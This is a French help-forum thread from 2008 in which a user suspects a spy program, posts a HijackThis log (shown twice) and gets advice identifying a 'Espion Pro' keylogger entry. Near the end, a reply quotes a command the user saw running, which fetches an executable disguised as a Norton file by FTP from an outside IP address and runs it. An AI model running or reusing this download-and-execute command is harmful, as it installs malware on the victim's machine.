Programme espion
Fermé
dax
-
4 févr. 2008 à 21:51
méditation22 Messages postés 4 Date d'inscription mardi 21 juin 2011 Statut Membre Dernière intervention 22 juin 2011 - 22 juin 2011 à 00:28
méditation22 Messages postés 4 Date d'inscription mardi 21 juin 2011 Statut Membre Dernière intervention 22 juin 2011 - 22 juin 2011 à 00:28
A voir également:
- Programme espion
- Programme demarrage windows 10 - Guide
- Programme démarrage windows 10 - Guide
- Fichier ouvert dans un autre programme - Guide
- Desinstaller un programme - Guide
- Programme bonjour c'est quoi ✓ - Forum Logiciels
20 réponses
Bonjour,
Merci à tous et à toutes de votre contribution, je vais essayer tt ça ce soir chez moi et j'éspère que j'arriverai à m'n debarrasser. Encore merci et bonne journée.
Merci à tous et à toutes de votre contribution, je vais essayer tt ça ce soir chez moi et j'éspère que j'arriverai à m'n debarrasser. Encore merci et bonne journée.
Bonsoir,
je viens de lncer hijackthis et voilà le resultat:
si quelqu'un peut m'aider à comprendre, ça sera avec plaisir. D'avance merci
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:00:45, on 05/02/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal
Running processes:
C:\WINDOW\System32\smss.exe
C:\WINDOW\system32\csrss.exe
C:\WINDOW\system32\winlogon.exe
C:\WINDOW\system32\services.exe
C:\WINDOW\system32\lsass.exe
C:\WINDOW\system32\svchost.exe
C:\WINDOW\system32\svchost.exe
C:\WINDOW\System32\svchost.exe
C:\WINDOW\system32\svchost.exe
C:\WINDOW\system32\svchost.exe
C:\WINDOW\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOW\system32\spoolsv.exe
C:\Program Files\Gizmo Project\mDNSResponder.exe
C:\WINDOW\system32\CTsvcCDA.exe
C:\WINDOW\system32\nvsvc32.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\Program Files\Spyware Doctor\pctsAuxs.exe
C:\Program Files\Spyware Doctor\pctsSvc.exe
C:\WINDOW\system32\svchost.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\WINDOW\System32\alg.exe
C:\Program Files\Spyware Doctor\pctsTray.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PccGuide.exe
C:\WINDOW\system32\WgaTray.exe
C:\WINDOW\Explorer.EXE
C:\WINDOW\system32\ctfmon.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\WINDOW\system32\LVCOMSX.EXE
C:\Program Files\Logitech\Video\LogiTray.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
C:\Program Files\Creative\Sync Manager Unicode\CTSyncU.exe
C:\Program Files\Creative\MediaSource5\MtdAcqu.exe
C:\Program Files\Logitech\Video\FxSvr2.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\MSN Messenger\livecall.exe
C:\Program Files\VideoLAN\VLC\vlc.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WLLoginProxy.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\WINDOW\system32\wbem\wmiprvse.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://alseraj.net/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Download Manager Browser Helper Object - {19C8E43B-07B3-49CB-BFFC-6777B593E6F8} - C:\PROGRA~1\FICHIE~1\fluxDVD\DOWNLO~1\XEBDLH~1.DLL
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar5.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar5.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 12\pccguide.exe"
O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOW\system32\LVCOMSX.EXE
O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe
O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [CanalPlayer] C:\Program Files\Lecteur CANALPLAY\CanalPlayer.exe
O4 - HKLM\..\Run: [Winspn] C:\Program Files\Winspn\winspn.exe
O4 - HKLM\..\Run: [Messaging] C:\Program Files\Instant Messenger Names\IM-svr.EXE
O4 - HKLM\..\Run: [ISTray] "C:\Program Files\Spyware Doctor\pctsTray.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
O4 - HKCU\..\Run: [LogitechSoftwareUpdate] "C:\Program Files\Logitech\Video\ManifestEngine.exe" boot
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOW\system32\ctfmon.exe
O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_8 -reboot 1
O4 - HKCU\..\Run: [CTSyncU.exe] "C:\Program Files\Creative\Sync Manager Unicode\CTSyncU.exe"
O4 - HKCU\..\Run: [MtdAcqu] "C:\Program Files\Creative\MediaSource5\MtdAcqu.exe" /s
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Windows &Live Favorites - https://onedrive.live.com/?id=favorites
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Ouvrir dans un nouvel onglet d'arrière-plan - res://C:\Program Files\Windows Live Toolbar\Components\fr-fr\msntabres.dll.mui/229?d71c481f205143d2807d08b24c53ee0e
O8 - Extra context menu item: Ouvrir dans un nouvel onglet de premier plan - res://C:\Program Files\Windows Live Toolbar\Components\fr-fr\msntabres.dll.mui/230?d71c481f205143d2807d08b24c53ee0e
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOW\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOW\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .pl: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll
O15 - Trusted Zone: *.canalplay.com
O15 - Trusted Zone: *.canalplusactive.com
O15 - Trusted Zone: *.canalplay.com (HKLM)
O15 - Trusted Zone: *.canalplusactive.com (HKLM)
O18 - Protocol: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll
O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
O23 - Service: Bonjour Service - Apple Computer, Inc. - C:\Program Files\Gizmo Project\mDNSResponder.exe
O23 - Service: Boonty Games - BOONTY - C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOW\system32\CTsvcCDA.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOW\system32\nvsvc32.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe
je viens de lncer hijackthis et voilà le resultat:
si quelqu'un peut m'aider à comprendre, ça sera avec plaisir. D'avance merci
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:00:45, on 05/02/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal
Running processes:
C:\WINDOW\System32\smss.exe
C:\WINDOW\system32\csrss.exe
C:\WINDOW\system32\winlogon.exe
C:\WINDOW\system32\services.exe
C:\WINDOW\system32\lsass.exe
C:\WINDOW\system32\svchost.exe
C:\WINDOW\system32\svchost.exe
C:\WINDOW\System32\svchost.exe
C:\WINDOW\system32\svchost.exe
C:\WINDOW\system32\svchost.exe
C:\WINDOW\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOW\system32\spoolsv.exe
C:\Program Files\Gizmo Project\mDNSResponder.exe
C:\WINDOW\system32\CTsvcCDA.exe
C:\WINDOW\system32\nvsvc32.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\Program Files\Spyware Doctor\pctsAuxs.exe
C:\Program Files\Spyware Doctor\pctsSvc.exe
C:\WINDOW\system32\svchost.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\WINDOW\System32\alg.exe
C:\Program Files\Spyware Doctor\pctsTray.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PccGuide.exe
C:\WINDOW\system32\WgaTray.exe
C:\WINDOW\Explorer.EXE
C:\WINDOW\system32\ctfmon.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\WINDOW\system32\LVCOMSX.EXE
C:\Program Files\Logitech\Video\LogiTray.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
C:\Program Files\Creative\Sync Manager Unicode\CTSyncU.exe
C:\Program Files\Creative\MediaSource5\MtdAcqu.exe
C:\Program Files\Logitech\Video\FxSvr2.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\MSN Messenger\livecall.exe
C:\Program Files\VideoLAN\VLC\vlc.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WLLoginProxy.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\WINDOW\system32\wbem\wmiprvse.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://alseraj.net/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Download Manager Browser Helper Object - {19C8E43B-07B3-49CB-BFFC-6777B593E6F8} - C:\PROGRA~1\FICHIE~1\fluxDVD\DOWNLO~1\XEBDLH~1.DLL
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar5.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar5.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 12\pccguide.exe"
O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOW\system32\LVCOMSX.EXE
O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe
O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [CanalPlayer] C:\Program Files\Lecteur CANALPLAY\CanalPlayer.exe
O4 - HKLM\..\Run: [Winspn] C:\Program Files\Winspn\winspn.exe
O4 - HKLM\..\Run: [Messaging] C:\Program Files\Instant Messenger Names\IM-svr.EXE
O4 - HKLM\..\Run: [ISTray] "C:\Program Files\Spyware Doctor\pctsTray.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
O4 - HKCU\..\Run: [LogitechSoftwareUpdate] "C:\Program Files\Logitech\Video\ManifestEngine.exe" boot
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOW\system32\ctfmon.exe
O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_8 -reboot 1
O4 - HKCU\..\Run: [CTSyncU.exe] "C:\Program Files\Creative\Sync Manager Unicode\CTSyncU.exe"
O4 - HKCU\..\Run: [MtdAcqu] "C:\Program Files\Creative\MediaSource5\MtdAcqu.exe" /s
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Windows &Live Favorites - https://onedrive.live.com/?id=favorites
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Ouvrir dans un nouvel onglet d'arrière-plan - res://C:\Program Files\Windows Live Toolbar\Components\fr-fr\msntabres.dll.mui/229?d71c481f205143d2807d08b24c53ee0e
O8 - Extra context menu item: Ouvrir dans un nouvel onglet de premier plan - res://C:\Program Files\Windows Live Toolbar\Components\fr-fr\msntabres.dll.mui/230?d71c481f205143d2807d08b24c53ee0e
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOW\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOW\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .pl: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll
O15 - Trusted Zone: *.canalplay.com
O15 - Trusted Zone: *.canalplusactive.com
O15 - Trusted Zone: *.canalplay.com (HKLM)
O15 - Trusted Zone: *.canalplusactive.com (HKLM)
O18 - Protocol: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll
O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
O23 - Service: Bonjour Service - Apple Computer, Inc. - C:\Program Files\Gizmo Project\mDNSResponder.exe
O23 - Service: Boonty Games - BOONTY - C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOW\system32\CTsvcCDA.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOW\system32\nvsvc32.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe
Kokliko
Messages postés
3815
Date d'inscription
samedi 20 octobre 2007
Statut
Contributeur
Dernière intervention
6 août 2010
748
4 févr. 2008 à 21:56
4 févr. 2008 à 21:56
Bonjour,
Pour savoir si c'est vraiment un virus qui te fait ce coup, fait un rapport hijackthis et poste le.
Je peux te dire comment faire, mais je n'ai pas encore acqui les capacités pour l'interpretation que je laisse aux experts de ce forum (grand, très grand merci à eux)
Télécharge le sur le site dans la rubrique téléchargement sécurité
Lance le puis:
clique sur "do a system scan and save logfile" (cf démo)
faire un copier coller du log entier sur le forum
Démo : (Merci a Balltrap34 pour cette réalisation)
http://pageperso.aol.fr/balltrap34/demohijack.htm
http://www.tutoriaux-excalibur.com/hijackthis.htm
https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html
Voilà. J'espère que ma modeste contribution te permettra d'y voir plus clair dans ton problème.
@+
Pour savoir si c'est vraiment un virus qui te fait ce coup, fait un rapport hijackthis et poste le.
Je peux te dire comment faire, mais je n'ai pas encore acqui les capacités pour l'interpretation que je laisse aux experts de ce forum (grand, très grand merci à eux)
Télécharge le sur le site dans la rubrique téléchargement sécurité
Lance le puis:
clique sur "do a system scan and save logfile" (cf démo)
faire un copier coller du log entier sur le forum
Démo : (Merci a Balltrap34 pour cette réalisation)
http://pageperso.aol.fr/balltrap34/demohijack.htm
http://www.tutoriaux-excalibur.com/hijackthis.htm
https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html
Voilà. J'espère que ma modeste contribution te permettra d'y voir plus clair dans ton problème.
@+
magicien10024
Messages postés
3174
Date d'inscription
mardi 22 janvier 2008
Statut
Membre
Dernière intervention
28 octobre 2018
283
4 févr. 2008 à 21:59
4 févr. 2008 à 21:59
bonsoir,
tu aura des indication utile
http://www.zebulon.fr/outils/scanports/test-securite.php
https://www.zebulon.fr/dossiers/autres/40-zebprotect.html
tu aura des indication utile
http://www.zebulon.fr/outils/scanports/test-securite.php
https://www.zebulon.fr/dossiers/autres/40-zebprotect.html
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
argaunotes
Messages postés
184
Date d'inscription
samedi 19 août 2006
Statut
Membre
Dernière intervention
8 mai 2009
19
4 févr. 2008 à 22:06
4 févr. 2008 à 22:06
Bonsoir,
A faire en mode sans échec (F8 au démarrage) avec prise en charge du réseau. Choisir Scanner de sécurité
http://safety.live.com/site/fr-FR/center/howsafe.htm?s_cid=mscom_msrt
Bonne chance ;-))
A faire en mode sans échec (F8 au démarrage) avec prise en charge du réseau. Choisir Scanner de sécurité
http://safety.live.com/site/fr-FR/center/howsafe.htm?s_cid=mscom_msrt
Bonne chance ;-))
magicien10024
Messages postés
3174
Date d'inscription
mardi 22 janvier 2008
Statut
Membre
Dernière intervention
28 octobre 2018
283
4 févr. 2008 à 22:13
4 févr. 2008 à 22:13
+ ca
http://check.sdv.fr:3658/cgi/scan?
http://check.sdv.fr:3658/cgi/scan?
espion3004
Messages postés
8607
Date d'inscription
mardi 10 juillet 2007
Statut
Membre
Dernière intervention
25 février 2020
1 432
5 févr. 2008 à 11:26
5 févr. 2008 à 11:26
salut à tous, ciblons le problème par un hijackthis !
Salut ^ ^)
J'espère que tu ne te balades pas à poil devant ta webcam de chez Logitech ?!
C:\WINDOW\system32\LVCOMSX.EXE
O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOW\system32\LVCOMSX.EXE
Merci !
J'espère que tu ne te balades pas à poil devant ta webcam de chez Logitech ?!
C:\WINDOW\system32\LVCOMSX.EXE
O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOW\system32\LVCOMSX.EXE
Merci !
Salut ^ ^)
C'est toi "dax", qui a installé 'Espion Pro' ?!
http://www.01net.com/windows/Utilitaire/cryptage_et_securite/fiches/28352.html
O4 - HKLM\..\Run: [Winspn] C:\Program Files\Winspn\winspn.exe
"Espion est un logiciel permettant de surveiller l'utilisation de votre ordinateur en votre absence. Il prend des captures d'écran à intervalles réguliers, que vous déterminez avant d'éteindre votre machine. Il permet également d'enregistrer toutes les touches frappées sur le clavier. Il vous suffit d'entrer les options de sauvegarde."
Pour réinstaller ce logiciel, ET SURTOUT POUR LE DÉSINSTALLER ; si ça peut aider :
http://forum.telecharger.01net.com/forum/high-tech/LOGICIELS/Windows-et-Logiciels/espion-sujet_87424_1.htm
Merci !
C'est toi "dax", qui a installé 'Espion Pro' ?!
http://www.01net.com/windows/Utilitaire/cryptage_et_securite/fiches/28352.html
O4 - HKLM\..\Run: [Winspn] C:\Program Files\Winspn\winspn.exe
"Espion est un logiciel permettant de surveiller l'utilisation de votre ordinateur en votre absence. Il prend des captures d'écran à intervalles réguliers, que vous déterminez avant d'éteindre votre machine. Il permet également d'enregistrer toutes les touches frappées sur le clavier. Il vous suffit d'entrer les options de sauvegarde."
Pour réinstaller ce logiciel, ET SURTOUT POUR LE DÉSINSTALLER ; si ça peut aider :
http://forum.telecharger.01net.com/forum/high-tech/LOGICIELS/Windows-et-Logiciels/espion-sujet_87424_1.htm
Merci !
espion3004
Messages postés
8607
Date d'inscription
mardi 10 juillet 2007
Statut
Membre
Dernière intervention
25 février 2020
1 432
6 févr. 2008 à 00:49
6 févr. 2008 à 00:49
Que faut il faire Anonyme ? alors ?
Salut ^ ^)
Déjà, placer un chiffon (qui ne raye pas) sur ta webcam "dax" ; avec 'micro intégré' ? = encore un problème le micro !
=> Où mieux, la débrancher ... pour évité l'espionnage audio/vidéo .
Pour le logiciel 'Espion Pro', si tu ne l'a pas installé toi-même 'dax', il faut vérifié quel logiciel '84785_norton.exe', serait téléchargé ...
=> Pour voir si c'est pas justement ce logiciel ou un autre ; caché derrière le nom '84785_norton.exe' .
Et pour la désinfection ; je fais confiance à 'espion3004' :) :
Est-ce que tu pourrais télécharger le fichier 'espion3004', si la commande fourni par "dax" fonctionne ?
=> De façon sécurisé pour ton pc bien-sûr ... pour voir quel logiciel c'est .
* "dax" pourrait redonner la commande exacte qui est envoyée, et nous dire que c'est pas son ip à lui o_O ;)
"j'ai la commande suivante qui s'exécute : cmd /c echo OPEN 82.233.255.7 24112>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit. Je vois des fenêtres qui s'ouvrent et qui se ferment" ...
Merci !
Déjà, placer un chiffon (qui ne raye pas) sur ta webcam "dax" ; avec 'micro intégré' ? = encore un problème le micro !
=> Où mieux, la débrancher ... pour évité l'espionnage audio/vidéo .
Pour le logiciel 'Espion Pro', si tu ne l'a pas installé toi-même 'dax', il faut vérifié quel logiciel '84785_norton.exe', serait téléchargé ...
=> Pour voir si c'est pas justement ce logiciel ou un autre ; caché derrière le nom '84785_norton.exe' .
Et pour la désinfection ; je fais confiance à 'espion3004' :) :
Est-ce que tu pourrais télécharger le fichier 'espion3004', si la commande fourni par "dax" fonctionne ?
=> De façon sécurisé pour ton pc bien-sûr ... pour voir quel logiciel c'est .
